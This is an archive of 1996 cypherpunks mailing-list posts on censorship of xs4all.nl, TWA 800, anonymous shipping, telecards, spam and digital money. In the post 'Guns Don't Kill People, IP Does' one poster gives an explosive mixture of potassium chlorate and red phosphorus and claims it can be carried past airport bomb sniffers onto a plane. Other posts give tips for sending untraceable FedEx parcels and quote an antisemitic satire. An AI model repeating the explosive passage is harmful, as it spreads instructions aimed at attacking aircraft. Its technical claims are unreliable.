Subject: Re: [WAS xs4all.nl] Terrorists
In-Reply-To: <Pine.LNX.3.94.960909105907.14405B-100000@blau.pin.de>
Message-ID: <VcNZTD64w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Stephan Schmidt <schmidt@pin.de> writes:

> One thought : How many of you would support terrorist
> web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?

http://www.terrorist.org ?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 10 Sep 1996 05:01:47 +0800
To: cypherpunks@toad.com
Subject: [less paranoid NOISE] Re: Odd Satellite observations
Message-ID: <2.2.32.19960909163111.00f9f3a0@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


Ok well like I said it was just paranoid noise. So the sats can locate ships
at sea. I wonder what else?

At 01:58 PM 9/9/96 GMT, Jim wrote:
>On Sun, 08 Sep 1996 11:45:45 -0700, I wrote:
>
>>I saw three satellites gliding across the sky (east to west) in 
>>a tight right triangle formation. The entire formation was not 
>>bigger than my hand at arms length. Has anyone else observed 
>>this?
>
>John:  You probably saw one of the NOSS (Naval Ocean Surveillance
>System) constellations.  There are several of these groupings -- all
>in triangular arrays.  They use some form of interferometry to locate
>ships at sea.
>
>Jim
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 10 Sep 1996 04:40:57 +0800
To: cypherpunks@toad.com
Subject: Re: [WAS xs4all.nl] Terrorists
Message-ID: <2.2.32.19960909163116.00f89c8c@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:32 AM 9/9/96 EDT, you wrote:
>Stephan Schmidt <schmidt@pin.de> writes:
>
>> One thought : How many of you would support terrorist
>> web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?
>
>http://www.terrorist.org ?
>

Damn! In my backyard no less!

whois terrorist.org
Terrorist Organization (TERRORIST2-DOM)
   1525 SW 14th #4
   Portland, OR 97201
   US





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael.tighe@Central.Sun.COM (Michael Tighe SUN IMP)
Date: Tue, 10 Sep 1996 02:10:11 +0800
To: cypherpunks-errors@toad.com (Dr.Dimitri Vulis KOTM)
Subject: Re: TWA 800 - Serious thread.
In-Reply-To: <56mZTD63w165w@bwalk.dm.com>
Message-ID: <199609091434.JAA09142@jeep.Central.Sun.COM>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM writes:

>I recall that the perp rented the vehicle and gave a $400 cash deposit.
>He subsequently returned to the rental agency, stated that the vehicle
>was stolen, and demanded his cash back. And the Oklahoma City perp was
>caught speeding with no licence plates.

>Shit. Whoever recruits those terrorists needs a better h.r. department to
>screen for stupidity. :-)

No, actually they are doing an outstanding job of finding a bunch of
usefull idiots to do the dirty work for them. And of course, serving them
up to law enforcement for punishment, while they remain behind the scenes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 10 Sep 1996 00:57:08 +0800
To: jya@pipeline.com (John Young)
Subject: RE: IDC_ard
Message-ID: <9608098422.AA842287223@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


jya@pipeline.com (John Young) forwarded:
>9-8-96. NYP Mag: 
 
>"The True Terror Is In the Card." 
 
>Faced with rising crime, illegal immigration, welfare 
>fraud and absentee parents, many bureaucrats and members 
>of Congress insist that the nation would run more 
>smoothly if we all had counterfeit-proof plastic 
>identity cards. 
 
>http://jya.com/idcard.txt  (11 kb) 
 
And to get all the Christian Right (no pun intended) up in arms, just suggest
that the best way to prevent theft of these ID cards would be to place the
information on a microchip and implant it in your body. Forehead and right wrist
preferably.

James 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rolf Weber <weber@iez.com>
Date: Mon, 9 Sep 1996 18:21:47 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <ae55ae08020210048be5@[207.167.93.63]>
Message-ID: <9609090806.AA12867@spibm02>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Though my German friends will perhaps feel I am picking on them, this is
> not so (this week Germany is in the hot seat, last week it was
> Singapore....).
> 
...the week before it was china.

> 
> * as Germany is bent on blocking sites which carry this subversive
> pamphlet, "Radikal," let us mirror it on thousands of sites around the
> world.
> 
yes, please do.

> 
> * wouldn't it be deliciously ironic if the "Free Speech Blue Ribbon" now
> attached to so many pages were to be joined by a "Star of David"? This Star
> of David symbol could mean "We support freedom to read, and our site
> contains the "Radikal" publication which Germans are forbidden to access."
> 
no, please don't.
there are millions of germans besides bundesanwaltschaft.

rolf
-- 
-----------------------------------------
Rolf Weber <weber@iez.com> | All I ask is a chance
IEZ AG   D-64625 Bensheim  | to prove that money
++49-6251-1309-109         | can't make me happy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rolf Weber <weber@iez.com>
Date: Mon, 9 Sep 1996 18:43:26 +0800
To: nobody@replay.com (Name Withheld by Request)
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <199609070035.CAA06972@basement.replay.com>
Message-ID: <9609090809.AA16205@spibm02>
MIME-Version: 1.0
Content-Type: text/plain


> 
> [It just says to live radically, and to read "radikal". But
> "radikal" is a terrorist magazine after all.]
> 
no, "radikal" isn't a terrorist magazine.
it's just ridiculous kiddy stuff.

rolf
-- 
-----------------------------------------
Rolf Weber <weber@iez.com> | All I ask is a chance
IEZ AG   D-64625 Bensheim  | to prove that money
++49-6251-1309-109         | can't make me happy.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 10 Sep 1996 07:04:22 +0800
To: cypherpunks@toad.com
Subject: Anonymous FedEx, was: What is the EFF doing exactly?
Message-ID: <v02130500ae599518f546@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>David Lesher wrote:

>Try & mail an anonymous FedEx package.

Not a problem.  You merely use the FedEx number of local company.  Get
FedEx forms from an unmanned FedEx pick-up point, fill one in (using an
impact printer, if desired, to simulate the appearance of the pre-addressed
forms given to their regular customers), attach to parcel and drop it in
the box (no finger prints please).

Works like a charm.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to perscription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Mon, 9 Sep 1996 19:16:13 +0800
To: "John F. Fricker" <jfricker@vertexgroup.com>
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <2.2.32.19960908184651.00ac63d4@vertexgroup.com>
Message-ID: <Pine.LNX.3.94.960909103404.13757A-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



September 9th,

I _can_ _access_ www.xs4all.nl _from_ _inside_ _Germany_.

-stephan

PS: using 3 different routes (accounts).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Sep 1996 07:43:46 +0800
To: Stephan Schmidt <schmidt@pin.de>
Subject: Re: ... subversive leftists
In-Reply-To: <Pine.LNX.3.94.960909125148.16761A-100000@blau.pin.de>
Message-ID: <3234583F.50E3@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Stephan Schmidt wrote:
> I hope this one was ironic.
> The Democratic People's German Reich is fully justified in cutting off
> contacts with subversive radical publications in Jew-dominated nations 
> like Holland.
> As Reichskommander Schmidt points out: "The citizen-units who access
> But this one is tasteless and insulting even if it was
> meant ironic.
> -stephan

Just a note: 'Jew' when used as an adjective is considered demeaning and 
offensive. One should use 'Jewish' instead.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Tue, 10 Sep 1996 07:08:14 +0800
To: roy@scytale.com
Subject: Re: Anonymous phone calls (was: What is the EFF doing exactly?)
Message-ID: <199609091748.NAA27475@attrh1.attrh.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:03 PM 9/7/96 CST, roy@scytale.com wrote:
>In Minneapolis, USWest has Telecard phones everywhere, and vending
>machines with bill accepters.  The calls are also flat rate at $0.25.
...
>Can Telecards be audited for usage?  If a TLA black-bags my $25 Telecard
>from my wallet, can they reconstruct what calls I made with it?

Easily.  They get the card number off the card, and then check their
long distance records for calls made with that card number.

With some cards, you can recharge the card instead of getting new ones,
if for some reason you want to increase the audit trail substantially.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kamml@secret.org
Date: Tue, 10 Sep 1996 03:18:23 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <v02140b01ae56cfd0d26b@[205.162.51.35]>
Message-ID: <v03007804ae59deab6d80@[166.84.192.39]>
MIME-Version: 1.0
Content-Type: text/plain


>>
>> Try & mail an anonymous FedEx package.
>
>Just lie on the sender label, isn't that obvious?  I know people who
>actually use "codeword" sender labels, in case FedEx or federales ask
>about a package they can tell by the sender mentioned which to disavow :)
>

Obvious if you can pay anonymously.


>> Try and pay cash in most Fedex offices.
>
>I always do and as long as I have exact change I have never been
>hassled.
>

Fedex will not accept cash in New York City. I have tried to pay cash and
been refused. I have talked to customer service and confirmed that they
will not accept cash in NYC although they will elsewhere.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Stromberg <strombrg@hydra.acs.uci.edu>
Date: Tue, 10 Sep 1996 09:26:52 +0800
To: Julian Assange <proff@suburbia.net>
Subject: Re: LACC: Re: What is the EFF doing exactly?
In-Reply-To: <199609080749.RAA01948@suburbia.net>
Message-ID: <323459C7.5492@hydra.acs.uci.edu>
MIME-Version: 1.0
Content-Type: text/plain


I sent this to you privately, because I did not want a public war. 
You've chosen to bring it to the list anyway.

What you've written below appears to be quite nonsequitur, but I suppose
one can guess the upshot.

Many governments are quite braindead, when it comes to crypto, yes.

I will reiterate: many governments are also quite braindead, when it
comes to demonstrating reasonably accurate "metaknowledge", when it
comes to having a clue about just how certain something really is.

I obviously applaud your efforts to free crypto.

I obviously deplore your efforts to fight crypto in the manner of the
ugliest of politicians, and find it quite hypocritical that you've
suggested that in so doing, you are -avoiding- arguments of those who
seek to destroy you.  I believe it is quite clear, you're arguing
against yourself: your methods are very much those of the ones who "seek
to destroy you.", and to the extent that this is true, I'd say they
-have- destroyed you.

Note that I have seen/noticed no example of this from you - only that
you have -stated- that things should be phrased in a quite B&W manner
for political advantage.

Were you seeking to make things messier, when you brought this to the
list without asking first?

Julian Assange wrote:
> > How many of the world's stupid policies have been enacted, because
> > someone decided to present only one side of an issue, realized it was
> > "the wrong side", and felt they couldn't later change their mind for the
> > better - because they presented the issue as overly black-and-white
> > initially?
> 
> I agree, however you are confusing large parties, so dominant as to form
> government and policy at whim with those that represent a particular
> cause or interest group. The EFF falls into the latter category. Its
> goals are relatively narrow, its membership tiny.  Such a small group,
> fighting under-resourced battle against powerful, conservative interests
> does not need, and should not espouse the arguments of those who seek to
> destroy it. When Canoing up a waterful, one does not need to paddle
> backwards 50% of the time in order to be "fair".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Schmidt <schmidt@pin.de>
Date: Mon, 9 Sep 1996 19:31:35 +0800
To: "<pstira@escape.com>
Subject: [WAS xs4all.nl] Terrorists
In-Reply-To: <Pine.BSI.3.91.960907114344.23857B-100000@escape.com>
Message-ID: <Pine.LNX.3.94.960909105907.14405B-100000@blau.pin.de>
MIME-Version: 1.0
Content-Type: text/plain



One thought : How many of you would support terrorist
web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?

-stephan 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Varange <varange@crl.com>
Date: Tue, 10 Sep 1996 07:52:54 +0800
To: schmidt@pin.de (Stephan Schmidt)
Subject: Guns Don't Kill People, IP Does
In-Reply-To: <Pine.LNX.3.94.960909105907.14405B-100000@blau.pin.de>
Message-ID: <199609091802.AA16555@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> One thought : How many of you would support terrorist
> web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?
> 
> -stephan 

Consdering how none of the above incidents are connected in any way 
to the internet, what do you mean?  And what if there were bomb making 
instructions on the internet and people are killed on account of it,
so what?

Mix roughly equal amounts of potassiam chlorate and red phosphorous 
together while thoroughly wet.  When the mixture dries it becomes a 
fulminating highly explosive mixture that doesn't even contain a 
nitrogen molecule, so seventy pounds of the explosive can be 
brought onto an airplane by passing through the nitrogen bomb 
sniffers in luggage.

You are now a potential terrorist Stephan Schmidt.  If the 
anti-extremists had their way, you will be a top candidate for 
arrest for being a dangerous German, we all know that now, we can 
honestly testify in German court you openly subscribed to an 
internet high tech e-mailing list where terrorist secrets were 
being traded.

How do you feel about being a terrorist, Mr. Schmidt?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Tue, 10 Sep 1996 02:57:17 +0800
To: cypherpunks@toad.com
Subject: Re: Conservation Laws, Money, Engines, and Ontology (fwd)
In-Reply-To: <9609061904.AA00879@ch1d157nwk>
Message-ID: <9609091508.AA04357@outland>
MIME-Version: 1.0
Content-Type: text/plain


> Donald Eastlake writes:
> >  I don't think any one step will solve all our spam problems
> >  but I wouldn't mind spending, say, 5 cents for each real piece
> >  of mail I sent outside my company and if end machines charged
> >  5 cents per piece of ouside mail received, I think spamming
> >  would be crippled.  (Note that with bad guy lists, you could
> >  collect the money and then just throw away the mail.)
> 
> So would you be willing to pay $50.00 for this message you sent to  
> cypherpunks?  If there are a thousand recipients and each one charges $0.05  
> for the priveledge of you sending it e-mail....  It seems like such a scheme 
> would not only cripple spam, but public discussion lists like this one.

	A better solution might be pay $whatever to be allowed to post
to the list.  Nothing is charged for receiving mail from the list, but you
have to ante up to join in the discussion.  If someone spams (spam being
defined up front and communicated to all list members) then their posting
priv's are revoked.  Then you can charge for receipt of mail normally
yet still have (relatively) open lists for discussion.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 10 Sep 1996 10:06:28 +0800
To: cypherpunks@toad.com
Subject: Hettinga Plays Horseman, Gets the Last Word...
Message-ID: <v03007800ae5a0b652457@[17.203.21.75]>
MIME-Version: 1.0
Content-Type: text/plain


It seems the former Office of Technology Assessment, now called the
Institute for Technology Assessment (Go, Newt!), had a need for a horseman
on their law-enforcement panel tomorrow.

Anyone know where I can get a riding crop? :-).

I'm scheduled, anyway. I'm in Cupertino at the moment (the Mac-Crypto
conference was, er, insanely great; more on that later), and I haven't
received the plane tickets yet (Bob Hettinga: You Buy, I Fly), though
they're supposed to show up today. We'll see when I get home tonight.

Oh. Any former Pac-Man addicts remember the name of the ghosts?

I think there were four, right?


Cheers,
Bob Hettinga

-----------------


The Institute
For
Technology
Assessment
ITA

INSTITUTE FOR TECHNOLOGY ASSESSMENT

WORKSHOP
DIGITAL MONEY AND PUBLIC POLICY

SEPTEMBER 10, 1996

US House of Representatives, Cannon Office Building, Room 121


A Workshop on Public Policy and New Technology:  "Digital Money" is a
rapidly evolving
financial/communications technology.  It is important that government,
industry, and the public fully understand the unique characteristics and
potential benefits and costs of  this radically new technology, so that
benefits may be fully realized and costs avoided through early, judicious
attention to public policy issues and concerns.

This workshop brings together the stakeholders and interested parties
-including the public and their government representatives-to consider the
issues that may be posed by this emerging technology.

In this workshop, attention will be focused on three questions:  What
issues need to be resolved now if development of digital money is to
proceed with minimal social costs and institutional risks? Where is there
general agreement about needed actions, or about reasonable solutions to
recognized problems? Where are there true uncertainties that must be
monitored, solved empirically, or objectively researched?

The workshop will consist of three sessions.  Each will begin with invited
presentations, followed by open discussion among presenters and
participants.


Moderator:  Dr. Wayne Boucher of Strategic Futures International

10 a.m.  Greetings and Introductions

Keynote Address:  The Honorable Michael Castle
Chairman, Subcommittee on Domestic and International Monetary Policy
House Committee on Banking and Financial Services

10:30 a.m.  Session I :  Digital Money Systems, Today and Tomorrow -
Industry Perspectives

Who are the players in developing digital money -and what new players will
emerge?  What are the potential benefits -and costs-for banks, credit card
companies, telecom companies, software vendors, or others? What has been
learned from early pilot systems?  What are the relative advantages-and
risks-of smart cards vs. network-based systems?  What older payment systems
lose ground to electronic money and smart cards? Is the playing field level
with respect to regulation and legislation?
Specific issues that may be raised include questions about state licensing,
Bank Secrecy Act coverage and financial privacy, protocols for payments of
different sizes, clearinghouses, and multiple mints.
	PRESENTERS:	Roger Applewhite, Benton International, Inc., Torrance,
California
	William Barr, Bellcore,  Basking Ridge, N.J.
	Electronic Funds Transfer Association, Reston, Virginia
	Kawika Daguio, American Bankers Association, Washington, D.C.


12:30 p.m.  Buffet lunch
1:15 p.m.  Session II.  Government's Role in the Development of Digital Money
How may existing laws and regulations impede the development of digital
money?  Does the possibility of future regulations or restrictions threaten
to drive development in sub-optimal directions? Do banks or other potential
developers need firmer assurances about regulatory intentions?
Does existing legislation and regulation adequately protect property and
contract rights with regard to digital money? What might be the effect of
European data protection initiatives, and what steps can the US government
take to circumvent international friction over this issue? What are the
major risks imposed by digital money, including risks of devaluation of US
currency? Could private insurance buttress against network failure,
electronic runs on money, or other sources of catastrophic risk? To what
extent could a failure in digital money systems contaminate or threaten the
traditional banking system, or the integrity of  traditional money systems?
Who will set standards with respect to risk management and capital adequacy
of clearing systems?

Should smart cards and small internet transactions be exempt from
Regulation E and EFTA protections against consumer liability? Would -or
should Representative Markey's On-line Privacy Bill cover digital money
transactions? Would non-bank digital money mints be covered by the Right to
Financial Privacy Act of 1978 and the Electronic Communications Act of
1986? Which party would bear the risk of loss in case of hard-disk crashes,
counterfeiting, network failure, etc.?

	PRESENTERS:  	Melanie Fein, Arnold & Porter, Washington, D.C.
	L. Richard Fisher, Morrison & Foerster, Washington, D.C.
	Professor Sarah Jane Hughes, Indiana University Law School


2:45 p.m.  Session III:  Law Enforcement Issues
Will anonymous instantaneous digital money create the possibility of new
crimes, or new versions of old crimes -theft, money laundering, insider
trading, etc.?  How would the flow of invisible, non-traceable money affect
law enforcement and the administration of justice? Do benefits of
encryption outweigh the possible harm to law enforcement capabilities? Does
digital money threaten the new focus of law enforcement on seizing the
proceeds of criminal enterprises? Considering the lessor of the Digital
Telephony Act, can early cooperation between digital money providers and
law enforcement avoid  the heavy costs of retrofitting systems to
accommodate the needs of law enforcement?
What is the appropriate role of government in assuring the security of
digital money systems against breaches by insiders, or criminals, or
terrorists? To what extent would digital money threaten the ability of the
IRS to collect taxes or to prosecute tax dodgers?
	PRESENTERS:	Roger Weiner, Deputy Director, FinCEN, U.S. Department
of the Treasury
	Scott Charney, Chief, Computer Crimes Section, U.S. Department of Justice
	Robert Hettinga, Boston, MA


4:00 p.m.  Adjournment

Conference Organizers
Steven Bonorris, Vary Coates (ITA) 202 686 0693

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Barbara Gamble <bgamble@wo0033wp.wo.blm.gov>
Date: Tue, 10 Sep 1996 03:27:59 +0800
To: cypherpunks@toad.com
Subject: Test...sorry about this - Reply
Message-ID: <s233fb41.062@wo0033wp.wo.blm.gov>
MIME-Version: 1.0
Content-Type: text/plain


I got it too.  And since I am a new subscriber, I thought it might be the
normal traffic.  The Welcome msg *did* say the list is high-traffic.  Still,
I was aghast--300 all at once, another 100 just in the last hour.  Is that
typical? (Please forgive such a question from a newcomer to the list.)

>>> Z.B. <zachb@netcom.com> 09/06 10:38 am >>>
I'm just posting this to see if there's something wrong with my mail  filter
- it dumped a ton of messages from this list over the night, and  I'm trying
to figure out why the !@%$# it did that.  Sorry for the  interruption.

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Sep 1996 09:28:19 +0800
To: cypherpunks@toad.com
Subject: L.A. Times articles, etc.
Message-ID: <3234624B.1C93@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm sure everyone is familiar with how newspaper articles are not 
necessarily "pure" news, i.e., they're often slanted toward a particular 
point of view.

Go back a few years, maybe 20 or more, and look at the front page of the 
L.A. Times (or probably any big-city paper). Many or most news pieces 
written by UPI, AP, etc., now 100% are written internally.

What y'all might want to think about is not just slanting and bias, but 
how certain people and organizations can actually *plant* a phony story 
on page one of a major paper like the L.A. Times. Go back a few months 
and check out the front-page article on real estate prices in the Calif. 
"Ventura Keys" area. Totally false. Story alleged that prices were 
"skyrocketing"; prices actually were absolutely flat, after having 
fallen by 35% or more in the previous couple of years.

Whoever authorized this story, if they didn't get a big kickback or gain 
some points for some future operation, then I can't imagine why they 
would print such a thing.

I hate to suggest anyone become more cynical than they already are, but, 
the front page(s) of a big-city newspaper are some of the most valuable 
real estate in western civilization, so do the math....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 10 Sep 1996 07:12:27 +0800
To: cypherpunks@toad.com
Subject: TWA flight 800, surface to air missles, conspiracypunks
Message-ID: <Pine.SUN.3.91.960909112948.4544H-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 9 Sep 1996 11:26:23 -0700 (PDT)
From: Brock N. Meeks <brock@well.com>
To: Declan McCullagh <declan@eff.org>

Surface to air missles do not need to make contact to explode.  They have 
a proximity system that explodes the missle if it gets within range.

Of course, sometimes the missle does hit;  there is a famous story -- 
documented -- of an SA-2 (an old Soviet SAM) hitting an RF-4 during Viet 
Nam.  The missle didn't explode but stuck in the plane like a dart;  the 
pilot flew the plane back to the airfield and was told to ditch the plane 
when the air traffic control noticed it stuck in his plane.

-- Brock





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 10 Sep 1996 03:45:46 +0800
To: schmidt@pin.de (Stephan Schmidt)
Subject: Re: [WAS xs4all.nl] Terrorists
In-Reply-To: <Pine.LNX.3.94.960909105907.14405B-100000@blau.pin.de>
Message-ID: <199609091635.LAA16589@homeport.org>
MIME-Version: 1.0
Content-Type: text


Stephan Schmidt wrote:

| One thought : How many of you would support terrorist
| web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?

I've given support to at least two terrorist organization, probably
closer to five in the last year.  I can't see supporting one more
would do any more harm.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 10 Sep 1996 06:56:10 +0800
To: AwakenToMe@aol.com
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <960906233848_279253392@emout14.mail.aol.com>
Message-ID: <Pine.LNX.3.93.960909113515.1028C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Sep 1996 AwakenToMe@aol.com wrote:

> In a message dated 96-09-06 23:31:06 EDT, rwright@adnetsol.com (Ross Wright)
> writes:
> <<  Everyone on this list seems to want to limit
>  government  intervention EXCEPT when it comes to spam, then every
>  one just holds the door open wide and let them in.  If they get that
>  inch, they WILL take the whole 9 YARDS!!!!!!  Get a clue, delete or
>  killfile those who spam and keep the government out of
>  cyberspace!!!!!!
>   >>
> Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces
> of  mail you take LESS than a second to delete them both with the handy
> delete key. These people are wasting more time complaining about it than they
> will ever do actually deleting it.

     I would guess that AOL isn't doing it just because of user complaints.
AOL has millions of accounts, and spammers try to hit ALL of the addresses.
That probably (I am guessing here) doubles (or triples) the load on AOL's 
already over burdened mail system. 




Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Mon, 9 Sep 1996 20:05:55 +0800
To: Enzo Michelangeli <enzo@ima.com>
Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
In-Reply-To: <Pine.WNT.3.94.960908100847.-490199B-100000@enzohome.ima.com>
Message-ID: <3233E582.FF6D5DF@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Enzo Michelangeli wrote:
> 
> On Sat, 7 Sep 1996, Hallam-Baker wrote:
> 
> > There is a massive difference between anonymous speech and anonymous
> > transactions. Anonymous speech can create problems (defamation etc.)
> > but in the main these are not problems the courts are particularly
> > good at dealing with.
> 
> Perhaps, but defamation is an issue that can't be ignored either,
> especially if one tries to build systems based on reputation.

It _is_ an issue that can be ignored - if the "defamer" backs up his
claims, then fine, the claims can be shown to be valid, otherwise ignore
those claims.  Simple.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Tue, 10 Sep 1996 04:08:46 +0800
To: cypherpunks@toad.com
Subject: Re: Junk Phone Calls, Metered Usage, and Cellphones
In-Reply-To: <Dy3VTD28w165w@bwalk.dm.com>
Message-ID: <9609091539.AA04462@outland>
MIME-Version: 1.0
Content-Type: text/plain



[ Telemarketer script removed, (spit :) ]
> 
> As you yourself point out, their charging you for each incoming call during
> business hours is unacceptable. Why don't they bill the 42c / minute to
> whomever is calling YOU, as they do with LD and 900 numbers?

	This is why I really like the service that I have.  I have a
"personal number" that is my voice, fax, pager, and voice mail.  If 
someone calls it, it asks them to wait while it locates me.  It then has
a list of numbers it calls to try and find me (desk at work, cell phone,
home phone after 5pm or weekends).  When I answer it tells me who's on
the phone, and if I don't want to talk to them I just hit a key and throw
them to the voice mail wolves.

	As for billing the caller, from what I hear at work I think 
it's because of problems with the way the cellular network does billing
that (currently) make caller-pays cellular undoable.  But that's a telephony 
problem and I'm just the resident UNIX weenie. :)

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 10 Sep 1996 06:37:29 +0800
To: John Young <jya@pipeline.com>
Subject: Re: IDC_ard
In-Reply-To: <199609071146.LAA06846@pipe1.t1.usa.pipeline.com>
Message-ID: <Pine.LNX.3.93.960909114739.1028G-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 7 Sep 1996, John Young wrote:
>    9-8-96. NYP Mag: 
>    "The True Terror Is In the Card." 
>       Faced with rising crime, illegal immigration, welfare 
>       fraud and absentee parents, many bureaucrats and members 
>       of Congress insist that the nation would run more 
>       smoothly if we all had counterfeit-proof plastic 
>       identity cards. 
>       Let's be clear that this is a one-way street. Once 
>       having established a requirement to carry photo ID, it 
>       will be difficult if not impossible to reverse. 
     
     I wouldn't go so far as to say "impossible". It also should be 
relatively easy to get a couple of these. 


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Tue, 10 Sep 1996 05:50:23 +0800
To: cypherpunks@toad.com
Subject: Re: ... subversive leftists
In-Reply-To: <Pine.LNX.3.94.960909125148.16761A-100000@blau.pin.de>
Message-ID: <199609091708.MAA25050@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.LNX.3.94.960909125148.16761A-100000@blau.pin.de>, on 09/09/96 at 12:53 PM,
   Stephan Schmidt <schmidt@pin.de> said:


>I hope this one was ironic.

>> The Democratic People's German Reich is fully justified in cutting off
>> contacts with subversive radical publications in Jew-dominated nations like
>> Holland.
>> 
>> As Reichskommander Schmidt points out: "The citizen-units who access
